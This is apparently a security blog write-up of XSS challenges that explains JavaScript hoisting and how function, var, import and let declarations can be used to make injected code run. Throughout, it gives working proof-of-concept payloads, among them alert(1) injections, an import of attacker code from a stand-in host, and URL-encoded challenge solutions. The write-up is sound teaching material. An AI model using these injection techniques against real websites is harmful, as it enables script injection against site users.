Having some fun with JavaScript hoisting

This will be a quick recap of some XSS challenges posted on Twitter during November/December of 2023, showing the usage and abuse of hoisting in JavaScript. If you have not had time to try the challenges yourself, I suggest doing that before reading any further. You learn more by banging your head against the problems presented here rather than just reading the solutions.

That said, if you have tried but failed, there is no shame in reading the post. Remember to go back and try the payloads and ensure you understand WHY they work.

Links:

https://twitter.com/Rhynorater/status/1722636015070744713
https://xss-node.glitch.me
https://try-to-catch.glitch.me

Ok, let’s go

Execute an undeclared function

Justin Gardner (@Rhynorater) posted a question on Twitter where he had been asked about a peculiar code injection scenario.

We have a code injection inside the parameters of a function call

x.y(1,INJECT);

where x is not defined. I solved this using the concept known as hoisting (as we shall see further down). Hoisting was not a new concept for me, but this was the first time I managed to use it in a cross-site scripting scenario. The discussions in the Twitter thread following this solution led me down a rabbit hole, taking a closer look at the concept of hoisting in JavaScript. This deep dive led me to create two related XSS challenges for others to try their hands at. Before going into the solution, first some background. Feel free to skip these parts if you are a hoist master.

Hoisting in JS

There is no point in me defining the concept of hoisting when such a great explanation exists at MDN. They describe hoisting like this:

JavaScript Hoisting refers to the process whereby the interpreter appears to move the declaration of functions, variables, classes, or imports to the top of their scope, prior to execution of the code.

There are a lot of interesting nuances to this concept in their full description of the topic, and I encourage everyone to read the entire thing. We will keep it simple and dig into some parts as we look at their implications in the following solutions.

What is essential to understand here is that a JavaScript engine makes at least two passes over any script. This is a big simplification, but we can think of JS execution as consisting of two steps. First, the code is parsed, which includes checking for syntax errors and converting it to an abstract syntax tree. This step also includes what we describe as hoisting, where certain forms of declarations are “moved” (hoisted) to the top of their scope. If the code passes the parsing step, the engine continues to execute the script.

The simplified description above contains two essential bits of knowledge that everyone trying to build more complex JS payloads should understand.

Any code (including the injected payload) must adhere to the syntax rules. Nothing will execute if the syntax is invalid anywhere in the final script.
Where a piece of code is placed in a script can matter, but the text of a code snippet is not the same as what the runtime ends up executing. Every language has rules that decide the order in which expressions are evaluated.
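The first point can be checked with a small sketch. Here I use new Function as a stand-in for a script tag (that substitution, and the names ranStatements and record, are my assumptions for illustration): the source has a perfectly valid first statement, but a stray parenthesis at the end stops everything from running.

```javascript
// Collects every statement that actually got to run.
const ranStatements = [];
globalThis.record = (message) => ranStatements.push(message);

let parseError = null;
try {
  // The first statement is valid, the second line ends with a stray ")".
  const script = new Function(
    'record("first statement");\nrecord("second statement"););'
  );
  script(); // never reached: parsing fails before any code runs
} catch (err) {
  parseError = err;
}

console.log(parseError && parseError.name, ranStatements.length);
```

The error surfaces while the source is parsed, so not even the valid first statement is executed.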

The four types of hoisting

Returning to MDN’s description of hoisting, we can read that there are four kinds of hoisting in JavaScript. Again, directly from MDN:

Being able to use a variable’s value in its scope before the line it is declared. (“Value hoisting”)

Being able to reference a variable in its scope before the line it is declared, without throwing a ReferenceError, but the value is always undefined. (“Declaration hoisting”)

The declaration of the variable causes behavior changes in its scope before the line in which it is declared.

The side effects of a declaration are produced before evaluating the rest of the code that contains it.

followed by

The four function declarations above are hoisted with type 1 behavior; var declaration is hoisted with type 2 behavior; let, const, and class declarations (also collectively called lexical declarations) are hoisted with type 3 behavior; import declarations are hoisted with type 1 and type 4 behavior.

We will keep this in mind when looking at some XSS fun.
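As a quick reference, here is a minimal sketch of the first three types in one function. The names hoistingTypes, declaredLater, laterVar and laterLet are made up for this example. Type 4 needs a module and an import, so it is left out here.

```javascript
function hoistingTypes() {
  const seen = {};

  // Type 1 (value hoisting): the function is callable before its declaration.
  seen.type1 = declaredLater();
  function declaredLater() {
    return "called before its declaration";
  }

  // Type 2 (declaration hoisting): the var exists, but its value is undefined.
  seen.type2 = laterVar;
  var laterVar = "assigned";

  // Type 3: the let binding exists but is in the temporal dead zone.
  try {
    laterLet;
  } catch (err) {
    seen.type3 = err.name;
  }
  let laterLet = "initialized";

  return seen;
}

console.log(hoistingTypes());
```

Only the let access throws. The function call and the var read both succeed, with the var read giving undefined.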

Back to the injection

So, how could we use this to solve Justin’s previous question? As we now know, we can declare a variable x even after it is used, as its declaration will be hoisted. My solution to the problem was to inject

alert(1));function x(){}//

which will create this piece of JavaScript when injected

x.y(1,alert(1));function x(){}//);

The steps taken during execution will now be

Hoist the declaration of x (value hoisting)
Execute “get property y of x” (returns the value undefined)
Execute “alert(1)” (the arguments are evaluated before we even know if the callee is a function!)
Execute the call “x.y(...)” and crash, as y (undefined) is not a function

We do need a function declaration of x as we need x to exist to make a property access on it. However, we don’t need y to exist on x as the parameters will be evaluated before checking if the returned value of y is a function or not.
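The order of the steps above can be observed with a small sketch that runs outside a browser. The local alert is a stand-in that records its calls, and valueHoistingDemo is a name I made up for the wrapper.

```javascript
function valueHoistingDemo() {
  // Stand-in for the browser's alert (assumption, so this runs in Node too).
  const alertCalls = [];
  const alert = (value) => alertCalls.push(value);

  let thrown = null;
  try {
    // x already holds the function here, so x.y is a plain undefined.
    x.y(1, alert(1));
  } catch (err) {
    thrown = err; // the call itself fails: undefined is not callable
  }

  // Declared after its first use, like in the injected payload.
  function x() {}

  return { alertCalls, errorName: thrown && thrown.name };
}

console.log(valueHoistingDemo());
```

The stand-in alert is called once, and only afterwards does the call to x.y throw a TypeError.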

If the original question had been formulated like this

x(1,INJECT);

we could instead have used “declaration hoisting” with var

x(1,alert(1));var x

as this version lacks any property lookup.
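The var variant can be sketched the same way. Again, alert is a recording stand-in and declarationHoistingDemo is a hypothetical wrapper name.

```javascript
function declarationHoistingDemo() {
  // Stand-in for the browser's alert (assumption, so this runs in Node too).
  const alertCalls = [];
  const alert = (value) => alertCalls.push(value);

  let thrown = null;
  try {
    // x exists (value undefined), so resolving it does not throw.
    // The arguments are evaluated before the "is it callable" check.
    x(1, alert(1));
  } catch (err) {
    thrown = err;
  }

  var x; // hoisted to the top of the function as undefined

  return { alertCalls, errorName: thrown && thrown.name };
}

console.log(declarationHoistingDemo());
```

Without the var x line, resolving x would throw a ReferenceError before any argument is evaluated, and alert would never run.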

What if we nest the function deeper?

As a spin-off to the previous question, I posted a challenge on Twitter: perform code execution in this situation

<script type="module">
  x.y.z("INJECTION")
</script>

We now face two nested property lookups. This time, a simple function x(){} declaration will not suffice as execution will follow these steps

Check that x exists
Try to look up y on x, retrieving undefined
Try to do a property lookup on undefined which does not allow property access. MDN again tells us, “Accessing a property on null or undefined throws a TypeError exception”
Thus, we will not reach the function call, and no parameters will be evaluated.
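A minimal sketch of why the old trick fails here, using the same recording stand-in for alert (nestedLookupDemo is a made-up name):

```javascript
function nestedLookupDemo() {
  // Stand-in for the browser's alert (assumption, so this runs in Node too).
  const alertCalls = [];
  const alert = (value) => alertCalls.push(value);

  let thrown = null;
  try {
    // x.y is undefined, so reading .z throws before any argument is evaluated.
    x.y.z(alert(1));
  } catch (err) {
    thrown = err;
  }

  function x() {}

  return { alertCalls, errorName: thrown && thrown.name };
}

console.log(nestedLookupDemo());
```

This time the TypeError comes from the property lookup, and the stand-in alert is never called.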

An alert reader will, however, note the type="module" part of the script tag. This will make browsers treat the script as a JavaScript module. Again, there are details to modules irrelevant to this blog post. Look them up if interested. What is interesting for us is that modules allow for the usage of import and export syntax.

Returning to the four hoisting rules, we can see that import statements are hoisted using rules 1 and 4. This means import statements are both “moved” to the top and also run before anything else in the script is executed.

I got a lot of great solutions sent to me over DM. Unfortunately, I was a bit unprepared and did not note down who sent what; I will try to do better in the future. Most of the initial solutions were of this type

alert(1)");import {x} from "https://example.com/module.js"//

creating this script

<script type="module">
  x.y.z("alert(1)");import {x} from "https://example.com/module.js"//")
</script>

And where the supplied module file contained something along the lines of this

// module.js
var x = {
  y: {
    z: function(param) {
      eval(param);
    }
  }
};

export { x };

This is a great solution that will also ensure no errors are thrown. However, a simpler solution existed, taking “rule 4” into account. The rule states that any “side effects” of the imported script will be executed before the rest of the initial script. This allows us to simplify the payload to this,

<script type="module">
  x.y.z("");import "https://example.com/module.js"//")
</script>

where the imported script now contains

// module.js
alert(1)

I also got an interesting alternative sent in from https://twitter.com/1_am_nek0. It looked like this

x.y.z("");import "data:text/jscript,alert(1)"//")

Which I thought was very clever! Note that import statements are only valid in the context of a module script, and don’t confuse import statements with the dynamic import expression import(""), which is an expression and never hoisted.

Try to catch a hoist

To sum up the hoisting deep dive, I decided to create a challenge highlighting the final edge case from MDN

Some prefer to see let, const, and class as non-hoisting, because the temporal dead zone strictly forbids any use of the variable before its declaration. This dissent is fine, since hoisting is not a universally-agreed term. However, the temporal dead zone can cause other observable changes in its scope, which suggests there’s some form of hoisting:
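A minimal sketch of that observable change, along the lines of the example MDN gives at this point. The try/catch, the outcome variable and the tdzDemo wrapper are my additions so the snippet runs to completion.

```javascript
function tdzDemo() {
  const x = 1;
  let outcome;
  {
    try {
      // This x is the inner one, which is still in its temporal dead zone.
      outcome = "read " + x;
    } catch (err) {
      outcome = err.name;
    }
    const x = 2; // declared later in the block, yet it already shadows the outer x
  }
  return outcome;
}

console.log(tdzDemo());
```

If the inner const were not hoisted at all, the read would simply see the outer x. Instead it throws a ReferenceError.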

Creating a situation where this third type of hoisting leads to an exploitable scenario was harder than the previous ones, so I don’t know how prevalent it would be in real life. As the only impact we can achieve with let/const/class hoisting is a ReferenceError, I decided to build the challenge around a try-catch block. This also meant designing some rather strange filtering: the challenge page filters the <, >, { and } characters to force the attacker to inject into both the try and the catch block without a way of altering the code blocks themselves.

This time, the scenario looked like this

<script>
(function(){
  config = {
    env: "prod"
  }  
  try {
    if(config){
      return;
    }
    // TODO handle missing config for: https://try-to-catch.glitch.me/
  } catch {
    fetch("/error", {
      method: "POST",
      body: {
        url:"https://try-to-catch.glitch.me/"
      }
    })
  }
})()
</script>

Solving this challenge requires three steps

Find the two injection points.
Use block-level hoisting to make the try block fail even if, at first, it might look impossible to escape the return statement.
Build a payload that generates valid syntax in both the try and the catch block.

The two injection points are not meant to be hard to find. They are just put there to have at least some “real life” aura. We can see that the URL is reflected in the code two times, first in a single-line comment and then in a string literal. Breaking out of a single-line comment can be done by adding any character that JavaScript interprets as a line terminator, and the string literal just needs a " character.

Breaking out of the single-line comment leaves us with a scenario that looks similar to the hoist edge case from MDN

config = {
    env: "prod"
  }  
try {
  if(config){
    return;
  }
  // TODO handle missing config for: https://try-to-catch.glitch.me/ <-- Break out here
  alert(1) // <-- Add injected code here 
}

We can now add any code we want after the comment line. However, because of the early return, execution never reaches this part of the code. What we can do is abuse block-level hoisting by adding either a let or a const declaration after the comment. Any such declaration is hoisted to the top of the block, so injecting, for example, let config creates this situation after hoisting (this is only pseudo code; the code itself is never “rewritten”)

config = {
    env: "prod"
  }  
try {
  let config;
  if(config){
    return;
  }
  // TODO handle missing config for: https://try-to-catch.glitch.me/ <-- Break out here
// <-- code is hoisted from here 
}

As we can see, the new config declaration is scoped to the try block and “shadows” the outer config variable. As the new variable is declared but not yet initialized when the if check runs, the check throws a ReferenceError and moves execution to the catch block.
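The effect can be reproduced outside the challenge page with a small sketch. The function names original and injected and the returned strings are made up for illustration; the return values only exist to show which branch ran.

```javascript
// Mirrors the implicit global from the challenge page.
globalThis.config = { env: "prod" };

function original() {
  try {
    if (config) {
      return "returned early";
    }
  } catch (err) {
    return "catch reached via " + err.name;
  }
}

function injected() {
  try {
    if (config) { // now refers to the block-scoped config, still uninitialized
      return "returned early";
    }
    let config; // the injected declaration, placed after the early return
  } catch (err) {
    return "catch reached via " + err.name;
  }
}

console.log(original());
console.log(injected());
```

The only difference between the two functions is the let config line after the return, and that line alone is enough to send execution into the catch block.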

The last step (and probably the hardest) is to generate a payload that will generate valid syntax in the catch block. This might feel contrived, but it is not an uncommon scenario to find yourself in. My initial solution when creating the challenge looked something like this

"+`\nlet config;`-alert(1)-`//`+"

Which will render like this

try {
    if(config){
      return;
    }
    // TODO handle missing config for: https://try-to-catch.glitch.me/"+`
let config;`-alert(1)-`//`+"
  } catch {
    fetch("/error", {
      method: "POST",
      body: {
        url:"https://try-to-catch.glitch.me/"+`
let config;`-alert(1)-`//`+""
      }
    })
  }

It can be hard to see at first, but both injected fragments are valid JavaScript. The try block contains

let config;`-alert(1)-`//`+"

Which declares a config variable, followed by a template literal containing the text -alert(1)-. The trailing //`+" is just a line comment. The catch block payload looks like this.

"https://try-to-catch.glitch.me/"+`\nlet config;`-alert(1)-`//`+""

Which is essentially a chain of + and - operators applied to a series of literal strings and our function call, so alert(1) runs when the expression is evaluated. There are many alternatives to this payload, and I thought I could list a few of them here. You will have to validate and figure them out by yourself (note that you will need to URL encode all special characters when put in the URL, encode \n as %0a)

",/*\nlet config="*/method:alert(999),x:"

"-alert()-`\nlet config;x=/`-"/

"+alert()+"\\nlet config

This last one uses only 23 chars, which I thought was the shortest possible until @shafigullin and @hash_kitten both independently sent me this 22-char one (these characters will not render well in the text so I will post the URL encoded form). The %E2%80%A8 part of the payload represents a single character \u2028 “Line separator”

"-alert()-"%E2%80%A8let%20config

https://try-to-catch.glitch.me/"-alert()-"%E2%80%A8let%20config
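If you want to check a candidate payload for syntax errors without a browser, a small helper along these lines can do it. This is only a sketch under assumptions: render is my reconstruction of the challenge template from the snippet shown earlier, the character filter is not modelled, and new Function is used purely to parse the result (nothing is executed).

```javascript
// Rebuilds the challenge script with the URL reflected in both places.
function render(payload) {
  const url = "https://try-to-catch.glitch.me/" + payload;
  return [
    '(function(){',
    '  try {',
    '    if(config){',
    '      return;',
    '    }',
    '    // TODO handle missing config for: ' + url,
    '  } catch {',
    '    fetch("/error", {',
    '      method: "POST",',
    '      body: {',
    '        url:"' + url + '"',
    '      }',
    '    })',
    '  }',
    '})()',
  ].join("\n");
}

// True if the source parses. The created function is never called.
function parses(source) {
  try {
    new Function(source);
    return true;
  } catch (err) {
    if (err instanceof SyntaxError) return false;
    throw err;
  }
}

const candidates = {
  initial: "\"+`\nlet config;`-alert(1)-`//`+\"",
  lineContinuation: "\"+alert()+\"\\\nlet config",
  lineSeparator: "\"-alert()-\"\u2028let config",
  naive: "\nalert(1)",
};

for (const [name, payload] of Object.entries(candidates)) {
  console.log(name, parses(render(payload)));
}
```

The naive payload breaks out of the comment but leaves a raw newline inside the string literal in the catch block, so the whole script is rejected. A payload that passes this check is only syntactically valid. Whether it fires still has to be confirmed on the real page.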

What’s next

I hope the challenges and this write-up can inspire you to dig into other parts of the JavaScript specification/implementation. If you don’t feel like reading the ECMAScript specification and want a more condensed summary of the parts of JavaScript that are useful in these scenarios, I highly recommend Gareth Heyes’s book JavaScript for Hackers. I have not had time to read the full book yet, but I know that it contains all the quote/newline tricks used by payloads sent in as solutions here.
I recommend MDN web docs and the full ECMAScript specification if you feel like doing some deep-diving yourself.

That’s it for now. Thanks for participating in the challenges!